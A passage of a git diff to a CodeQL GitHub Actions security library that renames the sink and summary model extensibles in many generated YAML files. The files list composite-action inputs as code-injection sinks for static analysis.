a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea9065..4ec47cb39750 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd2..81d137ce5478 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd5..79675d59c056 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc40..3310a67347cd 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6cf..d12963b43db2 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710b..1c63a9e6d0f7 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497c..e120de812c40 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e587..1be37285c9ef 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877e..aa6e9b684d08 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3b..221aa83de0b0 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890c..710079324272 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8b..bff13b29ecc1 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d4280..1f75dd81c046 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c076..15604c34a17a 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db046..aef7f4f6242c 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250da..f3a26e867ec6 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f5..4feab5714c79 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f753..3030f81072a0 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24eab..7f8885d1ec78 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5d..93e6b1e03122 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0a..5284159e9db5 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f5bdc3d4bcc9..ac8b8a5150ae 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbea..19e9448994eb 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b19170293..82c5713f9435 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59ef..2d4108331b91 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f7458..ccd49962fa4b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed4..a7e56c8626d0 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c346615..4c0df425e458 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e5..a69f2303dbe4 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e6..c2c87969e936 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119aea..c1c3bf433cdc 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0f..af21dca82055 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f2..18fdeffe1ec2 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d53..ee67e8821744 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc553..49caeb5f1dcf 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed202348..dda74b285da7 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef9..4b144103f8fb 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730abe..931658c0bb5e 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa1..f29632176626 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8e..1578e397369d 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63e..17c45e0d8edd 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c8..4e26b8728001 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b27215..d5fa53d1bbb3 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb220058..f90fb1c5e63e 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c896..d16c0792c6da 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4d..4d009c2d47db 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05db..afd875c22057 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ 